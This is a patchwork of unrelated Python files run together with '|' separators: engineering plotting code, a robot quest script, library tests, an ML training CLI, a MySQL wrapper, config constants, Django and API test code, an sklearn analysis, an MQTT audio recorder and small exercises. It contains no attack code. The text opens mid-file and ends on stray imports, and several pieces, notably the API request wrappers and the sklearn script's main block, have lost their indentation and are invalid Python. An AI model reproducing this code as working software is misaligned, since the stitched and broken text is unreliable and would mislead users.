    #plt.show()
    return fig
def plot_wall_secant_piles(n_pieces, a, D, dev_0=0.0, dev=0.0, wall_name='Wall'):
    """Plot a row of n_pieces secant piles (plan view) at wall top and base.

    Each pile deviates by dev_0 (top) / dev (base) in a random direction;
    even-indexed piles are primary, odd-indexed secondary.
    Returns the matplotlib Figure with two subplots (top, base).
    """
    x = np.linspace(0.0, (n_pieces-1)*a, n_pieces)
    y = np.zeros_like(x)
    pile_types = ['primary', 'secondary']
    #pile_colors = ['blue', 'red']
    pile_colors = ['white', 'white']
    fig, ax = plt.subplots(2, 1)
    # deviations
    #angles_deviation = 2*np.pi*np.random.rand(angles.size) # random angle of deviation for each of the piles
    # One random deviation direction per pile, shared by top and base.
    angles_deviation = 2*np.pi*np.random.uniform(0, 1, x.size) # random angle of deviation for each of the piles
    x0 = x + dev_0*np.cos(angles_deviation) # x top
    y0 = y + dev_0*np.sin(angles_deviation) # y top
    x = x + dev*np.cos(angles_deviation) # x bottom
    y = y + dev*np.sin(angles_deviation) # y bottom
    # top of shaft
    for i in range(0,len(x),2):
        circle_p = plt.Circle((x0[i],y0[i]), D/2, facecolor=pile_colors[0], edgecolor='black', zorder=0, alpha=0.3, label=pile_types[0])
        ax[0].add_patch(circle_p)
    for i in range(1, len(x), 2):
        circle_s = plt.Circle((x0[i],y0[i]), D/2, facecolor=pile_colors[1], edgecolor='black', zorder=0, alpha=0.3, linewidth=2.0, label=pile_types[1])
        ax[0].add_patch(circle_s)
    # bottom of shaft
    for i in range(0,len(x),2):
        circle_p = plt.Circle((x[i],y[i]), D/2, facecolor=pile_colors[0], edgecolor='black', zorder=0, alpha=0.3, label=pile_types[0])
        ax[1].add_patch(circle_p)
    for i in range(1, len(x), 2):
        circle_s = plt.Circle((x[i],y[i]), D/2, facecolor=pile_colors[1], edgecolor='black', zorder=0, alpha=0.3, linewidth=2.0, label=pile_types[1])
        ax[1].add_patch(circle_s)
    ax[0].set_title(wall_name + ' at top')
    ax[1].set_title(wall_name + ' at base (deviation {0:.1f} cm)'.format(dev*100))
    for axi in ax:
        axi.autoscale_view()
        axi.set_aspect('equal')
    #ax.legend()
    #handles, labels = plt.gca().get_legend_handles_labels()
    #by_label = OrderedDict(zip(labels, handles))
    #plt.legend(by_label.values(), by_label.keys())
    #plt.show()
    return fig
def plot_wall_secant_piles_3d(n_pieces, a, D, L, dev0=0.0, dev=0.0, wall_name='Wall'):
    """ Plots shaft in 3D with random drilling deviation
    dev0: maximum deviation at top of pile [m]
    dev: maximum deviation at base of pile [m]
    Returns the matplotlib Figure; primary piles default-colored,
    secondary piles orange."""
    x = np.linspace(0.0, (n_pieces-1)*a, n_pieces)
    y = np.zeros_like(x)
    # deviations
    #angles_deviation = 2*np.pi*np.random.rand(angles.size) # random angle of deviation for each of the piles
    # One random deviation direction per pile, shared by top and base.
    angles_deviation = 2*np.pi*np.random.uniform(0, 1, x.size) # random angle of deviation for each of the piles
    x_dev0 = x + dev0*np.cos(angles_deviation) # x top
    y_dev0 = y + dev0*np.sin(angles_deviation) # y top
    x_dev = x + dev*np.cos(angles_deviation) # x bottom
    y_dev = y + dev*np.sin(angles_deviation) # y bottom
    fig = plt.figure()
    #ax = fig.gca(projection='3d')
    ax = fig.add_subplot(projection='3d')
    # With fewer than 3 piles, view the wall edge-on for clarity.
    if n_pieces < 3:
        ax.view_init(azim=90.0, elev=0.0)
    for i in range(0,len(x),2):
        point0 = np.array([x_dev[i], y_dev[i], 0]) # bottom
        point1 = np.array([x_dev0[i], y_dev0[i], L]) # top
        plot_cylinder_2points(ax, point0, point1, D/2)
    for i in range(1, len(x), 2):
        point0 = np.array([x_dev[i], y_dev[i], 0]) # bottom
        point1 = np.array([x_dev0[i], y_dev0[i], L]) # top
        plot_cylinder_2points(ax, point0, point1, D/2, color='orange')
    ax.set_title(wall_name + ' 3D')
    #ax.set_aspect('equal')
    set_axis_equal_3d(ax)
    #plt.show()
    return fig
def plot_wall_secant_piles_3d_2items(n_pieces, a, D, L, dev0=0.0, dev=0.0, wall_name='Wall'):
    """ Plots shaft in 3D with random drilling deviation
    dev0: maximum deviation at top of pile [m]
    dev: maximum deviation at base of pile [m]
    Two-pile variant with worst-case (not random) deviation directions;
    returns the matplotlib Figure."""
    x = np.array([D/2, D/2 + a])
    y = np.zeros_like(x)
    # Worst case: piles lean toward each other at the top, away at the base.
    # NOTE: x is mutated in place, so x0 must be computed first.
    x0 = np.array([x[0] + dev0, x[1] - dev0]) # x top
    y0 = y # y top
    x[0] = x[0] - dev # x bottom
    x[1] = x[1] + dev # x bottom
    fig = plt.figure()
    #ax = fig.gca(projection='3d')
    ax = fig.add_subplot(projection='3d')
    # With fewer than 3 piles, view the wall edge-on for clarity.
    if n_pieces < 3:
        ax.view_init(azim=90.0, elev=0.0)
    for i in range(0,len(x),2):
        point0 = np.array([x[i], y[i], 0]) # bottom
        point1 = np.array([x0[i], y0[i], L]) # top
        plot_cylinder_2points(ax, point0, point1, D/2)
    for i in range(1, len(x), 2):
        point0 = np.array([x[i], y[i], 0]) # bottom
        point1 = np.array([x0[i], y0[i], L]) # top
        plot_cylinder_2points(ax, point0, point1, D/2, color='orange')
    ax.set_title(wall_name + ' 3D')
    #ax.set_aspect('equal')
    set_axis_equal_3d(ax)
    #plt.show()
    return fig
#coding:utf-8
def script(s, player=None):
    """Post-script of the "ChoixService" objective (Python 2).

    Depending on the user's recognized keyword answer, queues either the
    "PreparationJardin" or the "Arrosage" quest onto the player's current
    quest chain. Does nothing (after logging an error) when player is None.
    """
    from NaoQuest.quest import Quest
    from NaoCreator.setting import Setting
    import NaoCreator.Tool.speech_move as SM
    if not player:
        Setting.error("Error in execution of post_script of objective \"ChoixService\": player is None")
        return
    print s.__dict__
    if hasattr(s, "kw_answer"):
        print s.kw_answer
        # add quests according to the user's choice
        if s.kw_answer == "éxplication" or s.kw_answer == "éxplications":
            print "ajoue preparation jardin"
            new_qst = Quest(player.current_scenario.inner_name, "PreparationJardin")
        else:
            SM.speech_and_move(u"Ajoue de l'arrosage")
            print "ajoue arrosage"
            new_qst = Quest(player.current_scenario.inner_name, "Arrosage")
        # Append as a new branch after the current quest.
        l = len(player.current_quest.next_quests)
        new_qst.branch_id = l + 1
        player.current_quest.next_quests.append(new_qst)
|
import unittest
from neo.rawio.winwcprawio import WinWcpRawIO
from neo.test.rawiotest.common_rawio_test import BaseTestRawIO
class TestWinWcpRawIO(BaseTestRawIO, unittest.TestCase, ):
    """Standard neo rawio test-suite run against the WinWCP reader."""
    # The common BaseTestRawIO machinery drives the actual test methods.
    rawioclass = WinWcpRawIO
    entities_to_test = ['File_winwcp_1.wcp']
    files_to_download = entities_to_test

if __name__ == "__main__":
    unittest.main()
|
import click
import torch
from models.rnn_attention_s2s import RnnAttentionS2S
from utils import prepareData
@click.command(help="train env_name exp_dir data_path")
@click.option("-d","--data-path", default="data", type=str)
@click.option("-a", "--architecture", default="rnn_attention_s2s", type=str)
@click.option("-nit", "--n-iters", default=10000, type=int)
@click.option("-ml", "--max-length", default=10, type=int)
@click.option("-hs", "--hidden-size", default=256, type=int)
@click.option("-lr", "--learning_rate", default = 0.01)
@click.option("-tfr", "--teacher-forcing-ratio", default=0.5)
def main(
    data_path,
    architecture,
    n_iters,
    max_length,
    hidden_size,
    learning_rate,
    teacher_forcing_ratio,
):
    """Train an eng->fra seq2seq model selected by --architecture."""
    # Prefer GPU when available; the model places its tensors accordingly.
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    input_lang, output_lang, pairs = prepareData('eng', 'fra', path=data_path, max_length= max_length, prefixes=None)
    # Only one architecture is currently wired up.
    if architecture=="rnn_attention_s2s":
        model = RnnAttentionS2S(input_lang, output_lang, max_length=max_length, hidden_size=hidden_size, device=device)
    else:
        raise Exception('Unknown architecture')
    model.train(pairs, n_iters = n_iters, learning_rate=learning_rate, max_length=max_length, teacher_forcing_ratio=teacher_forcing_ratio)

if __name__ == '__main__':
    main()
|
import sys
sys.path.append('../500_common')
import lib_curation
import lib_ss
import time
from bs4 import BeautifulSoup
#--------------
# Parse a previously saved results page instead of driving a live browser:
# soup = lib_ss.main("/Users/nakamurasatoru/git/d_genji/genji_curation/src/500_common/Chrome11", "Profile 1")
soup = BeautifulSoup(open("data/result.html"), "lxml")
tr_list = soup.find_all("tr")
print(len(tr_list))
time.sleep(5)
# Output directory names for the original and the KuroNet-processed curation.
dirname0 = "kyoto02"
dirname = "kyoto02_kuronet"
# IIIF manifests to curate from.
manifests = [
    "https://rmda.kulib.kyoto-u.ac.jp/iiif/metadata_manifest/RB00007030/manifest.json"
]
lib_curation.main(dirname0, dirname, manifests, soup)
import unittest
from katas.kyu_7.double_char import double_char
class DoubleCharTestCase(unittest.TestCase):
    """Checks that double_char repeats every character of its input twice."""

    def test_equals(self):
        self.assertEqual(double_char('String'), 'SSttrriinngg')

    def test_equals_2(self):
        # Spaces are doubled like any other character.
        self.assertEqual(double_char('Hello World'), 'HHeelllloo WWoorrlldd')

    def test_equals_3(self):
        # Digits and punctuation are doubled as well.
        self.assertEqual(double_char('1234!_ '), '11223344!!__  ')
|
import os
import yaml
def loadyamlfile(yamlfile):
    """Parse every YAML document in *yamlfile* and return them as a list.

    yamlfile: path to a (possibly multi-document) YAML file, read as UTF-8.
    """
    with open(yamlfile, encoding='utf-8') as f:
        # FIX: yaml.load_all without an explicit Loader is deprecated and can
        # construct arbitrary Python objects from tagged input; safe_load_all
        # builds plain Python types only, which is all config files need.
        # Materialize inside the with-block: the loader is lazy and must read
        # while the file is still open.
        return list(yaml.safe_load_all(f))
def getnessussearchyaml():
    """Collect all YAML documents from every *.yml file in ./yamlfile."""
    here = os.path.dirname(os.path.abspath(__file__))
    yamldir = os.path.join(here, 'yamlfile')
    documents = []
    for name in os.listdir(yamldir):
        if not name.endswith('yml'):
            continue
        filepath = os.path.join(yamldir, name)
        print(filepath)
        documents.extend(loadyamlfile(filepath))
    return documents
|
import mysql.connector
from mysql.connector import Error
from logger import *
from traceback_info import *
import sys
# Driver error codes checked by must_reconnect() / must_rollback() below.
ERR_1 = 1
ERR_2 = 2
ERR_FATAL = 3
class DB_Session_MySQL:
    """MySQL session wrapper with logging, retry and rollback handling.

    Wraps mysql.connector with connect/disconnect/commit/rollback helpers and
    an execute() that retries operations after recoverable errors.
    """

    def __init__(self, username, password, db_id):
        logger.debug( "DB_Session_MySQL::__init__()" )
        self.username_ = username
        self.password_ = password
        self.db_id_ = db_id
        self.connection_ = None
        self.cursor_ = None

    def connect(self):
        """Open a connection to the local MySQL server; True on success."""
        logger.debug( "DB_Session_MySQL::connect()" )
        try:
            self.connection_ = mysql.connector.connect(host='localhost', database=self.db_id_, user=self.username_, password=self.password_)
            self.cursor_ = self.connection_.cursor()
            #self.cursor_.arraysize = 300
            if self.connection_.is_connected():
                logger.debug( "DB_Session_MySQL::connect() -> connected." )
                return True
        # FIX: "except Error, ex" is Python-2-only syntax; "as" works on
        # Python 2.6+ and Python 3 (applied throughout this class).
        except Error as ex:
            logger.error( "DB_Session_MySQL::connect() -> "
                          "MySQLException: %s" % (ex) )
        return False

    def disconnect(self):
        """Close the connection, logging (not raising) on failure."""
        try:
            self.connection_.close()
        except Error as ex:
            logger.error( "DB_Session_MySQL::disconnect() -> "
                          "MySQLException: %s" % (ex) )

    def rollback(self):
        """Roll back the current transaction; 0 on success, -1 on error."""
        try:
            self.connection_.rollback()
        except:
            return -1
        return 0

    def reconnect(self):
        """Drop the current connection and open a fresh one."""
        self.disconnect()
        return self.connect()

    def commit(self):
        """Commit the current transaction; 0 on success, -1 on error."""
        logger.debug( "DB_Session_MySQL::commit()" )
        ret = 0
        try:
            self.connection_.commit()
        except Error as ex:
            logger.error( "DB_Session_MySQL::commit() -> "
                          "MySQLException: %s" % (ex) )
            ret = -1
        return ret

    def execute( self, db_operation ):
        """Run db_operation.execute(cursor), retrying recoverable errors.

        Returns the operation's result, or -1 when it ultimately failed.
        """
        logger.debug( "DB_Session_MySQL::execute()" )
        reconnect_tries = 5
        retry = True
        ret = 0
        while retry:
            try:
                logger.debug( "DB_Session_MySQL::execute() -> "
                              "executing %s query." % db_operation.tag())
                ret = db_operation.execute( self.cursor_ )
                retry = False
            except Error as ex:
                # handle_exception decides whether a retry is worthwhile.
                retry = self.handle_exception( ex, reconnect_tries)
                reconnect_tries -= 1
                ret = -1
            except:
                logger.error( "DB_Session_MySQL::execute() -> "
                              "unhandled exception executing %s." % db_operation.tag() )
                logger.error( traceback_info() )
                retry = False
                ret = -1
        return ret

    def handle_exception(self, exception, retries):
        """Decide whether *exception* is recoverable; True means retry.

        Reconnects or rolls back depending on the driver error code.
        """
        logger.error( "DB_Session_MySQL::handle_exception() -> "
                      "MySQLException: %s %s" % (exception, self.cursor_.statement ) )
        # NOTE(review): assumes the driver packs an object with a .code
        # attribute into args[0] — confirm against the connector version.
        code = exception.args[0].code
        if not self.must_reconnect( code ) and \
                not self.must_rollback( code ):
            logger.error( "DB_Session_MySQL::handle_exception() -> "
                          "Unable to handle exception." )
            self.rollback()
            return False
        # NOTE(review): this decrement only affects the local copy; the
        # caller tracks its own reconnect_tries counter.
        retries -= 1
        if retries < 0:
            # FIX: corrected typo in the log message ("number if retrue").
            logger.warning( "DB_Session_MySQL::handle_exception() -> "
                            "Maximum number of retries exceeded." )
            return False
        if self.must_reconnect( code ):
            logger.warning( "Attempting to reconnect current session.")
            self.reconnect()
            return True
        if self.must_rollback( code ):
            logger.warning( "Performing Rollback in current session.")
            self.rollback()
            return True
        return False

    def must_reconnect(self, code):
        """True when *code* indicates a lost connection worth reconnecting."""
        return code == ERR_1 or code == ERR_2

    def must_rollback(self, code):
        """True when *code* indicates the transaction must be rolled back."""
        return code == ERR_FATAL

    def driver_name(self):
        """Identifier of this driver wrapper."""
        return "DB_Session_MySQL"
|
#coding:utf-8

# Application-wide constants. All *_SECONDS / *_SECOND values are TTLs in
# seconds.

# Picture (captcha) code validity: 3 minutes.
PIC_CODE_EXPIRES_SECONDS = 180
# SMS verification code validity: 5 minutes.
SMS_CODE_EXPIRES_SECONDS = 300
# Login session validity: 24 hours.
SESSION_EXPIRES_SECONDS = 86400
# Qiniu CDN: prefix prepended to stored image keys to build a full URL.
QINIU_URL_PREFIX = "http://olymmyzny.bkt.clouddn.com/"
# Qiniu image-processing query string (auto-orient, thumbnail, blur, quality).
QINIU_URL_SUFFIX = "?imageMogr2/auto-orient/thumbnail/x220/blur/1x0/quality/75|imageslim"
# Redis cache TTLs for area and house info: 24 hours each.
# (NOTE: "SECONDES" spelling kept -- other modules reference these names.)
REDIS_AREA_INFO_EXPIRES_SECONDES = 86400
REDIS_HOUSE_INFO_EXPIRES_SECONDES = 86400
# Maximum number of houses shown on the home page.
HOME_PAGE_MAX_HOUSES = 5
# Number of house-list pages kept in cache.
HOUSE_LIST_PAGE_CACHE_NUM = 2
# Home-page data cache TTL: 2 hours.
HOME_PAGE_DATA_REDIS_EXPIRE_SECOND = 7200
# Houses per page in the house list.
HOUSE_LIST_PAGE_CAPACITY = 2
"""API v2 tests."""
from django.urls import reverse
from modoboa.admin import factories as admin_factories
from modoboa.admin import models as admin_models
from modoboa.dnstools import factories
from modoboa.lib.tests import ModoAPITestCase
class DNSViewSetTestCase(ModoAPITestCase):
    """API tests for the DNS viewset."""

    @classmethod
    def setUpTestData(cls):  # NOQA:N802
        """Create test data."""
        super().setUpTestData()
        admin_factories.populate_database()
        # One DNS record of each type, all attached to the same test domain.
        record_specs = {
            "spf_rec": {"type": "spf", "value": "v=SPF1 mx -all",
                        "is_valid": True},
            "dmarc_rec": {"type": "dmarc", "value": "XXX", "is_valid": False,
                          "error": "Not a DMARC record"},
            "dkim_rec": {"type": "dkim", "value": "12345", "is_valid": False,
                         "error": "Public key mismatchs"},
            "ac_rec": {"type": "autoconfig", "value": "1.2.3.4",
                       "is_valid": True},
        }
        for attr, spec in record_specs.items():
            setattr(cls, attr,
                    factories.DNSRecordFactory(domain__name="test.com", **spec))

    def test_dns_detail(self):
        """The DNS detail endpoint exposes the domain's DMARC record."""
        domain = admin_models.Domain.objects.get(name="test.com")
        detail_url = reverse("v2:dns-dns-detail", args=[domain.pk])
        response = self.client.get(detail_url)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json()["dmarc_record"]["type"], "dmarc")
|
from common.run_method import RunMethod
import allure
@allure.step("在线诊断/条件获取接口")
def admission_condition_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/条件获取接口"
url = f"/service-question/admission/condition"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/诊断列表")
def admission_list_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/诊断列表"
url = f"/service-question/admission/list"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/校区、区域查询接口")
def admission_department_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/校区、区域查询接口"
url = f"/service-question/admission/department"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/待创建考试列表获取接口")
def admission_wait_create_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/待创建考试列表获取接口"
url = f"/service-question/admission/wait_create"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/区域查询接口")
def admission_department_query_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/区域查询接口"
url = f"/service-question/admission/department/query"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/试卷查询接口")
def admission_paper_list_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/试卷查询接口"
url = f"/service-question/admission/paper_list"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/诊断新增接口")
def admission_add_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/诊断新增接口"
url = f"/service-question/admission/add"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/编辑诊断接口")
def admission_update_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/编辑诊断接口"
url = f"/service-question/admission/update"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/诊断详情接口")
def admission_info_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/诊断详情接口"
url = f"/service-question/admission/info"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/诊断操作日志列表接口")
def admission_logs_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/诊断操作日志列表接口"
url = f"/service-question/admission/logs"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/考试记录列表")
def admission_list_result_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/考试记录列表"
url = f"/service-question/admission/list_result"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/考试试卷查看")
def admission_query_paper_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/考试试卷查看"
url = f"/service-question/admission/query_paper"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/诊断数据编辑")
def admission_update_admission_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/诊断数据编辑"
url = f"/service-question/admission/update_admission"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Fix plural display names and index Blog.posted."""

    # Must run after the migration that added Blog.first_name.
    dependencies = [
        ('myapp', '0003_blog_first_name'),
    ]

    operations = [
        # Admin UI should show "categories" rather than the default plural.
        migrations.AlterModelOptions(
            name='category',
            options={'verbose_name_plural': 'categories'},
        ),
        # Likewise "entries".
        migrations.AlterModelOptions(
            name='entry',
            options={'verbose_name_plural': 'entries'},
        ),
        # posted is set automatically at creation and indexed for lookups.
        migrations.AlterField(
            model_name='blog',
            name='posted',
            field=models.DateTimeField(auto_now_add=True, db_index=True),
            preserve_default=True,
        ),
    ]
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neural_network import MLPClassifier
from sklearn import metrics
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
from sklearn.tree import plot_tree
from cleaning import *
# Widen console output so wide DataFrames/arrays print on one line.
desired_width=320
pd.set_option('display.width', desired_width)
np.set_printoptions(linewidth=desired_width)
# Effectively disable the column limit when printing DataFrames.
pd.set_option('display.max_columns',100000)
def plot(response, cat_columns, num_columns):
    """
    Show a bar plot of every feature column against the target column.

    NOTE(review): reads the module-global DataFrame `df_copy` (created in the
    __main__ block below) instead of taking the data as a parameter, so it
    only works after the script body has run -- consider passing df in.

    :param response: name of the target column
    :param cat_columns: categorical column names (plotted as x-axis)
    :param num_columns: numeric column names (plotted against the target)
    :return: None (plots are shown interactively, one window per column)
    """
    for i in cat_columns:
        # x, y = response, i
        # (df
        # .groupby(x)[y]
        # .value_counts(normalize=True)
        # .mul(100)
        # .rename('percent')
        # .reset_index()
        # .pipe((sns.catplot, 'data'), x=x, y='percent', hue=y, kind='bar'))
        sns.barplot(df_copy[i], df_copy[response])
        plt.show()
    for i in num_columns:
        sns.barplot(df_copy[response], df_copy[i])
        plt.show()
if __name__ == "__main__":
# Data inlezen
file = "ODI-2020.csv"
df = pd.read_csv(file, sep=';')
# Data opschonen
df_copy = clean(df)
# Target variabele kiezen
response = 'Program'
# Features kiezen en onderscheiden in categorisch/continue
independent_vars = df_copy.drop(response, axis=1)
num_columns = list(independent_vars.select_dtypes(include=['float64']).columns)
cat_columns = list(independent_vars.select_dtypes(include=['object']).columns)
## Eventueel plotten tegenover alle andere variabelen
sns.barplot(df_copy['Age'], df_copy['Stress'])
plt.title('Mean stress per age')
plt.show()
# plot(response, cat_columns, num_columns)
# Categorische data continue maken
dummy_data = pd.get_dummies(data=independent_vars, columns=cat_columns)
# Volledige data opsplitten in train en test
X_train, X_test, y_train, y_test = train_test_split(dummy_data, df_copy[response], test_size=0.3, random_state=15)
# Kiezen welke modellen je wil testen met welke hyperparameters
model_names = ["RandomForest_entropy", "RandomForest_gini"]
models = [DecisionTreeClassifier(criterion='entropy'), DecisionTreeClassifier(criterion='gini')]
cross_val_scores = {}
for x in range(len(model_names)):
cross_val_scores[model_names[x]] = cross_val_score(models[x], X_train, y_train, cv=5).mean()
print(cross_val_scores)
best_model = models[model_names.index(max(cross_val_scores, key=lambda x: cross_val_scores[x]))]
# 5-fold cross validation, beste model kiezen
# Beste model toepassen op volledige dataset
best_model.fit(X_train, y_train)
print(f"Ultimate accuracy for {max(cross_val_scores, key=lambda x: cross_val_scores[x])}: {best_model.score(X_test, y_test)}")
## Itereren over aantal features om te kijken welke meeste accuracy heeft
features = {}
feature_scores = []
columns = []
trees = []
for x in range(1,len(list(dummy_data.columns))):
kbest = SelectKBest(k=x)
fit = kbest.fit(dummy_data, df_copy[response])
X_new = kbest.fit_transform(dummy_data, df_copy[response])
X_train, X_test, y_train, y_test = train_test_split(X_new, df_copy[response], test_size=0.3, random_state=15)
best_model = models[model_names.index(max(cross_val_scores, key=lambda y: cross_val_scores[y]))]
best_model.fit(X_train, y_train)
trees.append(best_model)
print(f"Final accuracy for {max(cross_val_scores, key=lambda y: cross_val_scores[y])} with {x} feature(s): {best_model.score(X_test, y_test)}")
features[x] = best_model.score(X_test, y_test)
feature_scores.append(features[x])
columns.append(kbest.get_support(indices=True))
plt.plot(range(1,len(list(dummy_data.columns))), feature_scores)
plt.title(f"Accuracy for amount of features with {response} as target variable")
plt.xlabel("No of features")
plt.ylabel("Accuracy")
plt.show()
print(features)
print(max(features, key= lambda x: features[x]))
conf_interval = [max(feature_scores) - 1.96 * np.sqrt((1/y_test.size * max(feature_scores)) * (1 - max(feature_scores))),
max(feature_scores) + 1.96 * np.sqrt((1/y_test.size * max(feature_scores)) * (1 - max(feature_scores)))]
important_columns = dummy_data.iloc[:,columns[max(features, key=lambda x: features[x]) - 1]]
print(f"Most important features: {list(important_columns.columns)}")
print(f"Confidence interval: {conf_interval}")
plot_tree(trees[max(features, key= lambda x: features[x]) - 1], filled=True)
plt.show() |
import pyaudio
import wave
import uuid
import sounddevice as sd
import json
import numpy as np
#remove
import paho.mqtt.client as mqtt
class LiveRecorder:
    """Record live audio with PyAudio and publish it over MQTT as JSON."""

    def __init__(self, mqtt_client):
        # Client used to publish audio; must already be connected.
        self.mqtt_client = mqtt_client
        self.recording = False
        self.p = pyaudio.PyAudio()
        # Frames per buffer read from the input stream.
        self.chunk = 256

    # Record and send as numpy array
    def record(self, topic):
        """Blocking loop: read audio and publish hex-encoded chunks to `topic`.

        Each MQTT message is JSON of the form {"audio": [hex, ...]} carrying
        10 chunks. Runs until stop() clears self.recording, then closes the
        stream and terminates PortAudio.
        NOTE(review): because PyAudio is terminated here, the instance cannot
        record a second time after record() returns.
        """
        stream = self.p.open(format=pyaudio.paInt16, # 16 bits per sample
                            channels=2,
                            rate=44100, # Record at 44100 samples per second
                            frames_per_buffer=self.chunk, # Record in chunks
                            input=True)
        self.recording = True
        # Record loop
        while self.recording:
            audiochunks = []
            for i in range(10):
                audiochunks.append(stream.read(self.chunk).hex())
            data_dict = {"audio" : audiochunks}
            # data_dict = {"audio" : stream.read(self.chunk).hex()}
            self.mqtt_client.publish(topic, json.dumps(data_dict))
        # Stop and close the stream
        stream.stop_stream()
        stream.close()
        # Terminate the PortAudio interface
        self.p.terminate()

    # Stop recording (flips the flag checked by the record loop)
    def stop(self):
        self.recording = False
broker = "mqtt.item.ntnu.no"
port = 1883
client = mqtt.Client()
client.connect(broker, port)
recorder = LiveRecorder(client)
recorder.record('team13')
# s_recording = {'name': 'recording', 'do': 'record()', "stop": "stop()"}
#self.mqtt_client.publish(topic, audiofile)
|
def allZeros(occ):
    """Return True when no counter in `occ` is still positive."""
    return not any(count > 0 for count in occ.values())
# Read n and the radii, then count how many passes of "decrement every
# counter" are needed before all counters hit zero -- i.e. the maximum
# multiplicity of any radius.
n = int(input())
# Fixes: `long` does not exist in Python 3 (ints are unbounded), and the
# counters must be keyed by the radius VALUE -- the original tested
# `radius[i] in occ` but incremented occ[i] (the index), which made every
# count 1.
radius = list(map(int, input().split(' ')))
occ = dict()
for r in radius:
    occ[r] = occ.get(r, 0) + 1
total = 0
while(not allZeros(occ)):
    # decrement all counters by one
    for key, cnt in occ.items():
        occ[key] = cnt - 1
    total += 1
print(total)
|
#!/usr/bin/env python3
import argparse
import pathlib
import sys
import time
